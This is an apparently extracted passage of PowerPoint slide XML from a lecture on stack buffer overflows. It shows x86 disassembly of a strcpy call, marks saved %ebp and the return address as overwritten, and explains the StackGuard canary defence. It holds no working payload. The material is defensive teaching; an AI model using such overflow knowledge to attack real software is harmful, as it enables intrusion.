              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>4(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483f0 &lt;+12&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483f4 &lt;+16&gt;:	lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-64(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483f7 &lt;+19&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x080483fa &lt;+22&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483ff &lt;+27&gt;:	leave  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048400 &lt;+28&gt;:	ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69342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47839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8003947" y="3110227"/>
            <a:ext cx="1032104" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1032104" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="761747" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>ebp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Straight Arrow Connector 9"/>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a:off x="8003947" y="6097085"/>
            <a:ext cx="1006456" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1006456" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="736099" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>esp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="Straight Arrow Connector 12"/>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9" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5261831" y="2221468"/>
            <a:ext cx="1367569" cy="1097464"/>
            <a:chOff x="5261831" y="2221468"/>
            <a:chExt cx="1367569" cy="1097464"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5430453" y="2221468"/>
              <a:ext cx="1198947" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
                <a:t>corrupted</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" i="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5261831" y="2580217"/>
              <a:ext cx="1367569" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
                <a:t>overwritten</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" i="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5261831" y="2949600"/>
              <a:ext cx="1367569" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
                <a:t>overwritten</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" i="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Arc 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="5561514"/>
            <a:ext cx="685800" cy="534486"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5305641"/>
              <a:gd name="adj2" fmla="val 16471755"/>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7" name="Curved Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7983262" y="5410200"/>
            <a:ext cx="824189" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="curved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 name="Donut 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="2949600"/>
            <a:ext cx="1873504" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd name="adj" fmla="val 6523"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Slide Number Placeholder 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6082412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3000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="150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StackGuard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="5320195" cy="4754563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Idea:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>prologue introduces a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>canary word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> between return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and locals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>epilogue checks canary before function returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wrong Canary =&gt; Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5777395" y="692436"/>
            <a:ext cx="2045189" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Cowen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. 1998]</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96667291"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="4817544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1461558"/>
              </a:tblGrid>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>arg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>arg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> 1</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ebp</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callee-save</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CANARY</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2246822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>locals</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8003947" y="3110227"/>
            <a:ext cx="1032104" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1032104" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="761747" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>ebp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Straight Arrow Connector 9"/>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8003947" y="6097085"/>
            <a:ext cx="1006456" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1006456" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="736099" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>esp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21"/>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7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42107847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QaEgROsvYJr9WlM1wRei0f"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ER6xg7Dt6H5Yz7z7DT3FGn"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag100.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ABDXY5xaURne6gJoWDgm0r"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag101.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="S2BtRPCaIjobNfIzphGORe"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag102.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="pRmUTP9kjiP9IBlueIyK93"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag103.xml><?xml version="1.0" encoding="utf-8"?>
